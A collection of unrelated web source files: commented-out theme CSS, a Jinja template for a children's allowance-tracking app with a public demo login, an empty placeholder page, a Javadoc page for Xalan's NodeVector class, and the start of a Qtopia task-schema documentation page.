/*font-size: 27px;*/ /*font-size: 2.7rem;*/ /*line-height: 1.1852;*/ /*}*/ /*.site-description {*/ /*font-size: 16px;*/ /*font-size: 1.6rem;*/ /*}*/ /*.widget {*/ /*font-size: 16px;*/ /*font-size: 1.6rem;*/ /*}*/ /*.widget blockquote {*/ /*font-size: 16px;*/ /*font-size: 1.6rem;*/ /*padding-left: 1.25em;*/ /*}*/ /*.widget blockquote cite,*/ /*.widget blockquote small {*/ /*font-size: 13px;*/ /*font-size: 1.3rem;*/ /*line-height: 1.8462;*/ /*}*/ /*.widget button,*/ /*.widget input,*/ /*.widget select,*/ /*.widget textarea {*/ /*font-size: 16px;*/ /*font-size: 1.6rem;*/ /*}*/ /*.widget button,*/ /*.widget input[type="button"],*/ /*.widget input[type="reset"],*/ /*.widget input[type="submit"] {*/ /*font-size: 13px;*/ /*font-size: 1.3rem;*/ /*padding: 0.8462em 1.6923em;*/ /*}*/ /*.widget input[type="text"],*/ /*.widget input[type="email"],*/ /*.widget input[type="url"],*/ /*.widget input[type="password"],*/ /*.widget input[type="search"],*/ /*.widget textarea {*/ /*padding: 0.5em;*/ /*}*/ /*.widget .wp-caption-text,*/ /*.widget .gallery-caption {*/ /*font-size: 13px;*/ /*font-size: 1.3rem;*/ /*line-height: 1.5385;*/ /*padding: 0.6154em 0;*/ /*}*/ /*.widget_calendar td,*/ /*.widget_calendar th {*/ /*line-height: 1.9375;*/ /*}*/ /*.widget_calendar caption {*/ /*margin: 0 0 1.5em;*/ /*}*/ /*.widget_archive li,*/ /*.widget_categories li,*/ /*.widget_links li,*/ /*.widget_meta li,*/ /*.widget_nav_menu li,*/ /*.widget_pages li,*/ /*.widget_recent_comments li,*/ /*.widget_recent_entries li {*/ /*padding: 0.4688em 0;*/ /*}*/ /*.widget_categories .children,*/ /*.widget_nav_menu .sub-menu,*/ /*.widget_pages .children {*/ /*margin: 0.4688em 0 0 1em;*/ /*padding-top: 0.4688em;*/ /*}*/ /*.widget_rss .rss-date,*/ /*.widget_rss cite {*/ /*font-size: 13px;*/ /*font-size: 1.3rem;*/ /*line-height: 1.8462;*/ /*}*/ /*.post-thumbnail {*/ /*margin-bottom: 2.9474em;*/ /*}*/ /*.entry-title,*/ /*.widecolumn h2 {*/ /*font-size: 39px;*/ /*font-size: 3.9rem;*/ /*line-height: 1.2308;*/ /*margin-bottom: 1.2308em;*/ /*}*/ /*.entry-content h1,*/ /*.entry-summary h1,*/ /*.page-content h1,*/ /*.comment-content h1 {*/ /*font-size: 39px;*/ /*font-size: 3.9rem;*/ /*line-height: 1.2308;*/ /*margin-top: 1.641em;*/ /*margin-bottom: 0.8205em;*/ /*}*/ /*.entry-content h2,*/ /*.entry-summary h2,*/ /*.page-content h2,*/ /*.comment-content h2 {*/ /*font-size: 32px;*/ /*font-size: 3.2rem;*/ /*line-height: 1.25;*/ /*margin-top: 2em;*/ /*margin-bottom: 1em;*/ /*}*/ /*.entry-content h3,*/ /*.entry-summary h3,*/ /*.page-content h3,*/ /*.comment-content h3 {*/ /*font-size: 27px;*/ /*font-size: 2.7rem;*/ /*line-height: 1.1852;*/ /*margin-top: 2.3704em;*/ /*margin-bottom: 1.1852em;*/ /*}*/ /*.entry-content h4,*/ /*.entry-summary h4,*/ /*.page-content h4,*/ /*.comment-content h4 {*/ /*font-size: 22px;*/ /*font-size: 2.2rem;*/ /*line-height: 1.4545;*/ /*margin-top: 2.9091em;*/ /*margin-bottom: 1.4545em;*/ /*}*/ /*.entry-content h5,*/ /*.entry-content h6,*/ /*.entry-summary h5,*/ /*.entry-summary h6,*/ /*.page-content h5,*/ /*.page-content h6,*/ /*.comment-content h5,*/ /*.comment-content h6 {*/ /*font-size: 19px;*/ /*font-size: 1.9rem;*/ /*line-height: 1.2632;*/ /*margin-top: 3.3684em;*/ /*margin-bottom: 1.6842em;*/ /*}*/ /*.entry-content .more-link:after,*/ /*.entry-summary .more-link:after {*/ /*top: 3px;*/ /*}*/ /*.author-info .avatar {*/ /*height: 56px;*/ /*margin: 0 1.6842em 1.6842em 0;*/ /*width: 56px;*/ /*}*/ /*.author-link:after {*/ /*font-size: 24px;*/ /*top: 0;*/ /*}*/ /*.posted-on:before,*/ /*.byline:before,*/ /*.cat-links:before,*/ /*.tags-links:before,*/ /*.comments-link:before,*/ /*.entry-format:before,*/ /*.edit-link:before,*/ /*.full-size-link:before {*/ /*top: 4px;*/ /*}*/ /*.taxonomy-description {*/ /*padding-top: 0.4211em;*/ /*}*/ /*.page-title,*/ /*.comments-title,*/ /*.comment-reply-title,*/ /*.post-navigation .post-title {*/ /*font-size: 27px;*/ /*font-size: 2.7rem;*/ /*line-height: 1.1852;*/ /*}*/ /*.page-links {*/ /*margin-bottom: 1.4736em;*/ /*}*/ /*.page-links a,*/ /*.page-links > span {*/ /*margin: 0 0.25em 0.25em 0;*/ /*}*/ /*.entry-attachment {*/ /*margin-bottom: 1.6842em;*/ /*}*/ /*.format-aside .entry-title,*/ /*.format-image .entry-title,*/ /*.format-video .entry-title,*/ /*.format-quote .entry-title,*/ /*.format-gallery .entry-title,*/ /*.format-status .entry-title,*/ /*.format-link .entry-title,*/ /*.format-audio .entry-title,*/ /*.format-chat .entry-title {*/ /*font-size: 22px;*/ /*font-size: 2.2rem;*/ /*line-height: 1.4545;*/ /*margin-bottom: 1.4545em;*/ /*}*/ /*.format-link .entry-title a:after {*/ /*top: 3px;*/ /*}*/ /*.comments-title {*/ /*margin-bottom: 1.4545em;*/ /*}*/ /*.comment-list article,*/ /*.comment-list .pingback,*/ /*.comment-list .trackback {*/ /*padding: 1.6842em 0;*/ /*}*/ /*.comment-list + .comment-respond,*/ /*.comment-navigation + .comment-respond {*/ /*padding-top: 1.6842em;*/ /*}*/ /*.comment-list .children > li {*/ /*padding-left: 1.4737em;*/ /*}*/ /*.comment-author .avatar {*/ /*height: 56px;*/ /*margin-right: 1.6842em;*/ /*top: 3px;*/ /*width: 56px;*/ /*}*/ /*.bypostauthor > article .fn:after {*/ /*top: 8px;*/ /*}*/ /*.comment-metadata .edit-link:before {*/ /*top: 8px;*/ /*}*/ /*.pingback .edit-link:before {*/ /*top: 8px;*/ /*}*/ /*.comment-content ul,*/ /*.comment-content ol {*/ /*margin-bottom: 1.6842em;*/ /*}*/ /*.comment-list .reply a {*/ /*padding: 0.4375em 0.875em;*/ /*}*/ /*.comment-form,*/ /*.no-comments {*/ /*padding-top: 1.6842em;*/ /*}*/ /*embed,*/ /*iframe,*/ /*object,*/ /*video {*/ /*margin-bottom: 1.6842em;*/ /*}*/ /*.wp-audio-shortcode,*/ /*.wp-video,*/ /*.wp-playlist.wp-audio-playlist {*/ /*font-size: 19px;*/ /*font-size: 1.9rem;*/ /*margin-bottom: 1.6842em;*/ /*}*/ /*.wp-caption,*/ /*.gallery {*/ /*margin-bottom: 1.6842em;*/ /*}*/ /*.widecolumn .mu_alert {*/ /*margin-bottom: 1.6842em;*/ /*}*/ /*.widecolumn p {*/ /*margin: 1.6842em 0;*/ /*}*/ /*.widecolumn p + h2 {*/ /*margin-top: 1.641em;*/ /*}*/ /*.widecolumn #key,*/ /*.widecolumn .mu_register #blog_title,*/ /*.widecolumn .mu_register #user_email,*/ /*.widecolumn .mu_register #blogname,*/ /*.widecolumn .mu_register #user_name {*/ /*font-size: 19px;*/ /*font-size: 1.9rem;*/ /*}*/ /*.widecolumn .mu_register #blog_title,*/ /*.widecolumn .mu_register #user_email,*/ /*.widecolumn .mu_register #user_name {*/ /*margin: 0 0 0.421em;*/ /*}*/ /*}*/ /*/!***/ /** 16.7 Desktop X-Large 1403px*/ /**!/*/ /*@media screen and (min-width: 87.6875em) {*/ /*body:before {*/ /*width: -webkit-calc(50% - 289px);*/ /*width: calc(50% - 289px);*/ /*}*/ /*}*/ /*/!***/ /** 17.0 Print*/ /**!/*/ /*@media print {*/ /*body {*/ /*background: none !important; /!* Brute force since user agents all print differently. *!/*/ /*font-size: 11.25pt;*/ /*}*/ /*.secondary-toggle,*/ /*.navigation,*/ /*.page-links,*/ /*.edit-link,*/ /*#reply-title,*/ /*.comment-form,*/ /*.comment-edit-link,*/ /*.comment-list .reply a,*/ /*button,*/ /*input,*/ /*textarea,*/ /*select,*/ /*.widecolumn form,*/ /*.widecolumn .mu_register form {*/ /*display: none;*/ /*}*/ /*.site-header,*/ /*.site-footer,*/ /*.hentry,*/ /*.entry-footer,*/ /*.page-header,*/ /*.page-content,*/ /*.comments-area,*/ /*.widecolumn {*/ /*background: none !important; /!* Make sure color schemes dont't affect to print *!/*/ /*}*/ /*body,*/ /*blockquote,*/ /*blockquote cite,*/ /*blockquote small,*/ /*label,*/ /*a,*/ /*.site-title a,*/ /*.site-description,*/ /*.post-title,*/ /*.author-heading,*/ /*.entry-footer,*/ /*.entry-footer a,*/ /*.taxonomy-description,*/ /*.entry-caption,*/ /*.comment-author,*/ /*.comment-metadata,*/ /*.comment-metadata a,*/ /*.comment-notes,*/ /*.comment-awaiting-moderation,*/ /*.no-comments,*/ /*.site-info,*/ /*.site-info a,*/ /*.wp-caption-text,*/ /*.gallery-caption {*/ /*color: #000 !important; /!* Make sure color schemes don't affect to print *!/*/ /*}*/ /*pre,*/ /*abbr[title],*/ /*table,*/ /*th,*/ /*td,*/ /*.site-header,*/ /*.site-footer,*/ /*.hentry + .hentry,*/ /*.author-info,*/ /*.page-header,*/ /*.comments-area,*/ /*.comment-list + .comment-respond,*/ /*.comment-list article,*/ /*.comment-list .pingback,*/ /*.comment-list .trackback,*/ /*.no-comments {*/ /*border-color: #eaeaea !important; /!* Make sure color schemes don't affect to print *!/*/ /*}*/ /*.site {*/ /*margin: 0 7.6923%;*/ /*}*/ /*.sidebar {*/ /*position: relative !important; /!* Make sure sticky sidebar doesn't affect to print *!/*/ /*}*/ /*.site-branding {*/ /*padding: 0;*/ /*}*/ /*.site-header {*/ /*padding: 7.6923% 0;*/ /*}*/ /*.site-description {*/ /*display: block;*/ /*}*/ /*.hentry + .hentry {*/ /*margin-top: 7.6923%;*/ /*}*/ /*.hentry.has-post-thumbnail {*/ /*padding-top: 7.6923%;*/ /*}*/ /*.sticky-post {*/ /*background: #000 !important;*/ /*color: #fff !important;*/ /*}*/ /*.entry-header,*/ /*.entry-footer {*/ /*padding: 0;*/ /*}*/ /*.entry-content,*/ /*.entry-summary {*/ /*padding: 0 0 7.6923%;*/ /*}*/ /*.post-thumbnail img {*/ /*margin: 0;*/ /*}*/ /*.author-info {*/ /*margin: 0;*/ /*}*/ /*.page-content {*/ /*padding: 7.6923% 0 0;*/ /*}*/ /*.page-header {*/ /*padding: 3.84615% 0;*/ /*}*/ /*.comments-area {*/ /*border: 0;*/ /*padding: 7.6923% 0 0;*/ /*}*/ /*.site-footer {*/ /*margin-top: 7.6923%;*/ /*padding: 3.84615% 0;*/ /*}*/ /*.widecolumn {*/ /*margin: 7.6923% 0 0;*/ /*padding: 0;*/ /*}*/ /*}*/
app/templates/index.html
zsolt-szabo/allowance_app
{% extends "base.html" %} {% block content %} <script> var credentials = "EMAIL:"; credentials += " anonymous@"; credentials += "coward.com"; credentials += " PASSWORD:"; credentials += "slashdot" </script> {% if name is defined and name != '' %} {# ############################################################## #} {# ###################### Logged in as parent ################### #} {# ############################################################## #} <h1>Hi {{ name }}! </h1> {% if is_child != true %} <div class="div2"> <a name="kids"/> <table> <tr><th>Your kid accounts <br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<a href="/child_register1">(Register</a> a new child)</th><th>&nbsp;</th></th></th></th></tr> {% for kid in kids %} <tr> <td style="background-color: white"> <a href='ledger?kid={{ kid.firstname }}:{{ kid.animal1 }}:{{ kid.animal2 }}'>{{ kid.firstname }} ({{ kid.animal1 }}/{{ kid.animal2 }})</a></td> <td>&nbsp;</td> <td>&nbsp;</td> <td>&nbsp;</td> <td> <select onchange="this.options[this.selectedIndex].value && (window.location = this.options[this.selectedIndex].value);"> <option value="">Select action...</option> <option value="allowance?kid={{ kid.firstname }}:{{ kid.animal1 }}:{{ kid.animal2 }}">Allowance Settings</option> <option value="kid_manage?kid={{ kid.firstname }}:{{ kid.animal1 }}:{{ kid.animal2 }}">Sub-account and Password Settings</option> <option value="ledger?kid={{ kid.firstname }}:{{ kid.animal1 }}:{{ kid.animal2 }}">Add/Subtract Money and review balance</option> <option value="delete_kid?kid={{ kid.firstname }}:{{ kid.animal1 }}:{{ kid.animal2 }}">Delete This account (you will be asked to confirm)</option> </select> </td> </tr> {% endfor %} </tr> </table> </div> <hr> <div> Total balance for all your kid accounts: <font size="+2" color="#804000">{{money_symbol}}{{'%0.2f' % total_owed}}</font> <br> Your total monthly allowance payout:&nbsp;&nbsp; <font size="+2" color="#804000">{{money_symbol}}{{'%0.2f' % monthly_outlay}}</font> </div> <hr> {% else %} {# ############################################################## #} {# ###################### Logged in as child ################### #} {# ############################################################## #} <table> {% for kid in kids %} <tr> <td>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</td> <td><a href='ledger?kid={{ kid.firstname }}:{{ kid.animal1 }}:{{ kid.animal2 }}'><img width="150px" height="150px" src="static/Ledger.svg"></a></td> <td><a href='ledger?kid={{ kid.firstname }}:{{ kid.animal1 }}:{{ kid.animal2 }}'>Add/Subtract or Review balance</a></td></td> </tr><tr> <td>&nbsp;</> <td><a href='allowance?kid={{ kid.firstname }}:{{ kid.animal1 }}:{{ kid.animal2 }}'><img src="static/Happy Child.svg"></a></td> <td>Review <a href='allowance?kid={{ kid.firstname }}:{{ kid.animal1 }}:{{ kid.animal2 }}'>Allowance settings</a></td> </tr><tr> <td>&nbsp;</td> <td><a href='kid_manage?kid={{ kid.firstname }}:{{ kid.animal1 }}:{{ kid.animal2 }}'><img src="static/gear.svg"></a></td> <td><a href='kid_manage?kid={{ kid.firstname }}:{{ kid.animal1 }}:{{ kid.animal2 }}'>Password and Account settings</a></td> </tr> {% endfor %} </tr> </table> {% endif %} <div style="height: 50em;"></div> {% else %} {# ############################################################## #} {# ######################### NOT LOGGED IN ###################### #} {# ############################################################## #} <p></p> <div class='base1'> <p> Welcome to your online allowance tracking application<br> Please login with your <a href="/login"><img alt="Parent Login" title="Parent" style="width:50px;height:50px;" src="static/ParentLogin.svg"></a> parent account to configure your kids accounts/allowances or add/remove money. </p> <p> Login with your <a href="/child_login"><img alt="Child Login" title="child" style="width:50px;height:50px;" src="static/ChildLogin.svg"></a>child account to review balances or remove money. </p> <p> You can also <a href="/register"><img alt="Register" title="register" style="width:50px;height:50px;" src="static/Register.svg"></a> register a new parent account </p> <p>Or if you want to just spin the wheels, log in with <a href="" onClick="alert(credentials);"><img alt="Credentials" title="Credentials" style="width:50px;height:50px;" src="static/credentials.svg"></a> these credentials.</p> </div> {% endif %} {% endblock %}
www/index.html
sapk/Make-Them-Slow-Down
<!DOCTYPE html> <html> <head> <title>Make Them Slow Down</title> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width"> </head> <body> <header> <h1>Make Them Slow Down</h1> </header> </body> </html>
lib/xalan-j_2_7_0/docs/apidocs/org/apache/xml/utils/class-use/NodeVector.html
MrStaticVoid/iriverter
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN"> <!--NewPage--> <HTML> <HEAD> <!-- Generated by javadoc on Sat Aug 06 17:04:42 EDT 2005 --> <TITLE> Xalan-Java 2.7.0: Uses of Class org.apache.xml.utils.NodeVector </TITLE> <LINK REL ="stylesheet" TYPE="text/css" HREF="../../../../../stylesheet.css" TITLE="Style"> </HEAD> <BODY BGCOLOR="white"> <!-- ========== START OF NAVBAR ========== --> <A NAME="navbar_top"><!-- --></A> <TABLE BORDER="0" WIDTH="100%" CELLPADDING="1" CELLSPACING="0"> <TR> <TD COLSPAN=2 BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A NAME="navbar_top_firstrow"><!-- --></A> <TABLE BORDER="0" CELLPADDING="0" CELLSPACING="3"> <TR ALIGN="center" VALIGN="top"> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../overview-summary.html"><FONT CLASS="NavBarFont1"><B>Overview</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../package-summary.html"><FONT CLASS="NavBarFont1"><B>Package</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../org/apache/xml/utils/NodeVector.html"><FONT CLASS="NavBarFont1"><B>Class</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#FFFFFF" CLASS="NavBarCell1Rev"> &nbsp;<FONT CLASS="NavBarFont1Rev"><B>Use</B></FONT>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../package-tree.html"><FONT CLASS="NavBarFont1"><B>Tree</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../deprecated-list.html"><FONT CLASS="NavBarFont1"><B>Deprecated</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../index-all.html"><FONT CLASS="NavBarFont1"><B>Index</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../help-doc.html"><FONT CLASS="NavBarFont1"><B>Help</B></FONT></A>&nbsp;</TD> </TR> </TABLE> </TD> <TD ALIGN="right" VALIGN="top" ROWSPAN=3><EM> </EM> </TD> </TR> <TR> <TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2"> &nbsp;PREV&nbsp; &nbsp;NEXT</FONT></TD> <TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2"> <A HREF="../../../../../index.html" TARGET="_top"><B>FRAMES</B></A> &nbsp; &nbsp;<A HREF="NodeVector.html" TARGET="_top"><B>NO FRAMES</B></A></FONT></TD> </TR> </TABLE> <!-- =========== END OF NAVBAR =========== --> <HR> <CENTER> <H2> <B>Uses of Class<br>org.apache.xml.utils.NodeVector</B></H2> </CENTER> <TABLE BORDER="1" CELLPADDING="3" CELLSPACING="0" WIDTH="100%"> <TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor"> <TD COLSPAN=2><FONT SIZE="+2"> Packages that use <A HREF="../../../../../org/apache/xml/utils/NodeVector.html">NodeVector</A></FONT></TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD><A HREF="#org.apache.xml.utils"><B>org.apache.xml.utils</B></A></TD> <TD>Implementation of Xalan utility classes.&nbsp;</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD><A HREF="#org.apache.xpath"><B>org.apache.xpath</B></A></TD> <TD>Implementation of XPath; for the most part, only classes meant for public use are found at this root level of the XPath packages.&nbsp;</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD><A HREF="#org.apache.xpath.axes"><B>org.apache.xpath.axes</B></A></TD> <TD>Implementation of XPath LocationPath support -- primary classes are LocPathIterator and UnionPathIterator.&nbsp;</TD> </TR> </TABLE> &nbsp; <P> <A NAME="org.apache.xml.utils"><!-- --></A> <TABLE BORDER="1" CELLPADDING="3" CELLSPACING="0" WIDTH="100%"> <TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor"> <TD COLSPAN=2><FONT SIZE="+2"> Uses of <A HREF="../../../../../org/apache/xml/utils/NodeVector.html">NodeVector</A> in <A HREF="../../../../../org/apache/xml/utils/package-summary.html">org.apache.xml.utils</A></FONT></TD> </TR> </TABLE> &nbsp; <P> <TABLE BORDER="1" CELLPADDING="3" CELLSPACING="0" WIDTH="100%"> <TR BGCOLOR="#CCCCFF" CLASS="TableSubHeadingColor"> <TD COLSPAN=2>Methods in <A HREF="../../../../../org/apache/xml/utils/package-summary.html">org.apache.xml.utils</A> with parameters of type <A HREF="../../../../../org/apache/xml/utils/NodeVector.html">NodeVector</A></FONT></TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>&nbsp;void</CODE></FONT></TD> <TD><CODE><B>NodeVector.<A HREF="../../../../../org/apache/xml/utils/NodeVector.html#appendNodes(org.apache.xml.utils.NodeVector)">appendNodes</A></B>(<A HREF="../../../../../org/apache/xml/utils/NodeVector.html">NodeVector</A>&nbsp;nodes)</CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Append the nodes to the list.</TD> </TR> </TABLE> &nbsp; <P> <A NAME="org.apache.xpath"><!-- --></A> <TABLE BORDER="1" CELLPADDING="3" CELLSPACING="0" WIDTH="100%"> <TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor"> <TD COLSPAN=2><FONT SIZE="+2"> Uses of <A HREF="../../../../../org/apache/xml/utils/NodeVector.html">NodeVector</A> in <A HREF="../../../../../org/apache/xpath/package-summary.html">org.apache.xpath</A></FONT></TD> </TR> </TABLE> &nbsp; <P> <TABLE BORDER="1" CELLPADDING="3" CELLSPACING="0" WIDTH="100%"> <TR BGCOLOR="#CCCCFF" CLASS="TableSubHeadingColor"> <TD COLSPAN=2>Subclasses of <A HREF="../../../../../org/apache/xml/utils/NodeVector.html">NodeVector</A> in <A HREF="../../../../../org/apache/xpath/package-summary.html">org.apache.xpath</A></FONT></TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>&nbsp;class</CODE></FONT></TD> <TD><CODE><B><A HREF="../../../../../org/apache/xpath/NodeSetDTM.html">NodeSetDTM</A></B></CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;The NodeSetDTM class can act as either a NodeVector, NodeList, or NodeIterator.</TD> </TR> </TABLE> &nbsp; <P> <TABLE BORDER="1" CELLPADDING="3" CELLSPACING="0" WIDTH="100%"> <TR BGCOLOR="#CCCCFF" CLASS="TableSubHeadingColor"> <TD COLSPAN=2>Methods in <A HREF="../../../../../org/apache/xpath/package-summary.html">org.apache.xpath</A> with parameters of type <A HREF="../../../../../org/apache/xml/utils/NodeVector.html">NodeVector</A></FONT></TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>&nbsp;void</CODE></FONT></TD> <TD><CODE><B>NodeSetDTM.<A HREF="../../../../../org/apache/xpath/NodeSetDTM.html#appendNodes(org.apache.xml.utils.NodeVector)">appendNodes</A></B>(<A HREF="../../../../../org/apache/xml/utils/NodeVector.html">NodeVector</A>&nbsp;nodes)</CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Append the nodes to the list.</TD> </TR> </TABLE> &nbsp; <P> <A NAME="org.apache.xpath.axes"><!-- --></A> <TABLE BORDER="1" CELLPADDING="3" CELLSPACING="0" WIDTH="100%"> <TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor"> <TD COLSPAN=2><FONT SIZE="+2"> Uses of <A HREF="../../../../../org/apache/xml/utils/NodeVector.html">NodeVector</A> in <A HREF="../../../../../org/apache/xpath/axes/package-summary.html">org.apache.xpath.axes</A></FONT></TD> </TR> </TABLE> &nbsp; <P> <TABLE BORDER="1" CELLPADDING="3" CELLSPACING="0" WIDTH="100%"> <TR BGCOLOR="#CCCCFF" CLASS="TableSubHeadingColor"> <TD COLSPAN=2>Subclasses of <A HREF="../../../../../org/apache/xml/utils/NodeVector.html">NodeVector</A> in <A HREF="../../../../../org/apache/xpath/axes/package-summary.html">org.apache.xpath.axes</A></FONT></TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>&nbsp;class</CODE></FONT></TD> <TD><CODE><B><A HREF="../../../../../org/apache/xpath/axes/RTFIterator.html">RTFIterator</A></B></CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD> </TR> </TABLE> &nbsp; <P> <HR> <!-- ========== START OF NAVBAR ========== --> <A NAME="navbar_bottom"><!-- --></A> <TABLE BORDER="0" WIDTH="100%" CELLPADDING="1" CELLSPACING="0"> <TR> <TD COLSPAN=2 BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A NAME="navbar_bottom_firstrow"><!-- --></A> <TABLE BORDER="0" CELLPADDING="0" CELLSPACING="3"> <TR ALIGN="center" VALIGN="top"> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../overview-summary.html"><FONT CLASS="NavBarFont1"><B>Overview</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../package-summary.html"><FONT CLASS="NavBarFont1"><B>Package</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../org/apache/xml/utils/NodeVector.html"><FONT CLASS="NavBarFont1"><B>Class</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#FFFFFF" CLASS="NavBarCell1Rev"> &nbsp;<FONT CLASS="NavBarFont1Rev"><B>Use</B></FONT>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../package-tree.html"><FONT CLASS="NavBarFont1"><B>Tree</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../deprecated-list.html"><FONT CLASS="NavBarFont1"><B>Deprecated</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../index-all.html"><FONT CLASS="NavBarFont1"><B>Index</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../help-doc.html"><FONT CLASS="NavBarFont1"><B>Help</B></FONT></A>&nbsp;</TD> </TR> </TABLE> </TD> <TD ALIGN="right" VALIGN="top" ROWSPAN=3><EM> </EM> </TD> </TR> <TR> <TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2"> &nbsp;PREV&nbsp; &nbsp;NEXT</FONT></TD> <TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2"> <A HREF="../../../../../index.html" TARGET="_top"><B>FRAMES</B></A> &nbsp; &nbsp;<A HREF="NodeVector.html" TARGET="_top"><B>NO FRAMES</B></A></FONT></TD> </TR> </TABLE> <!-- =========== END OF NAVBAR =========== --> <HR> Copyright © 2005 Apache XML Project. All Rights Reserved. </BODY> </HTML>
doc/html/qtopiadesktop/src-tools-qdsync-task-xsd.html
muromec/qtopia-ezx
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>src/tools/qdsync/task.xsd</title> <link href="classic.css" rel="stylesheet" type="text/css" /> </head> <body> <table border="0" cellpadding="0" cellspacing="0" width="100%"> <tr> <td align="left" valign="top" width="32"><img src="images/qpelogo.png" align="left" width="32" height="32" border="0" /></td> <td width="1">&nbsp;&nbsp;</td><td class="postheader" valign="center"><a href="../index.html"><font color="#004faf">Qtopia Home</font></a>&nbsp;&middot; <a href="index.html"><font color="#004faf">Index</font></a>&nbsp;&middot; <a href="classes.html"><font color="#004faf">Classes</font></a>&nbsp;&middot; <a href="headers.html"><font color="#004faf">Headers</font></a>&nbsp;&middot; <a href="overviews.html"><font color="#004faf">Overviews</font></a> </td> <td align="right" valign="top"><img src="images/codeless.png" align="right" border="0" /></td></tr></table><h1 class="title">src/tools/qdsync/task.xsd<br /><span class="subtitle"></span> </h1> <ul> </ul> <pre> &lt;?xml version=&quot;1.0&quot; encoding=&quot;utf-8&quot;?&gt; &lt;!-- /**************************************************************************** ** ** This file is part of the Qtopia Opensource Edition Package. ** ** Copyright (C) 2008 Trolltech ASA. ** ** $QT_EXTENDED_DUAL_LICENSE$ ** ****************************************************************************/ Qtopia PIM task schema --&gt; &lt;xs:schema xmlns:xs=&quot;http://www.w3.org/2001/XMLSchema&quot;&gt; &lt;xs:simpleType name=&quot;statusType&quot;&gt; &lt;xs:restriction base=&quot;xs:NMTOKEN&quot;&gt; &lt;xs:enumeration value=&quot;NotStarted&quot;/&gt; &lt;xs:enumeration value=&quot;InProgress&quot;/&gt; &lt;xs:enumeration value=&quot;Completed&quot;/&gt; &lt;xs:enumeration value=&quot;Waiting&quot;/&gt; &lt;xs:enumeration value=&quot;Deferred&quot;/&gt; &lt;/xs:restriction&gt; &lt;/xs:simpleType&gt; &lt;xs:simpleType name=&quot;priorityType&quot;&gt; &lt;xs:restriction base=&quot;xs:NMTOKEN&quot;&gt; &lt;xs:enumeration value=&quot;VeryHigh&quot;/&gt; &lt;xs:enumeration value=&quot;High&quot;/&gt; &lt;xs:enumeration value=&quot;Normal&quot;/&gt; &lt;xs:enumeration value=&quot;Low&quot;/&gt; &lt;xs:enumeration value=&quot;VeryLow&quot;/&gt; &lt;/xs:restriction&gt; &lt;/xs:simpleType&gt; &lt;xs:complexType name=&quot;identifierType&quot; mixed=&quot;true&quot;&gt; &lt;xs:annotation&gt; &lt;xs:documentation xml:lang=&quot;en&quot;&gt; localIdentifier refers to the parsing entity. E.g. if parsed on the device, the id is local 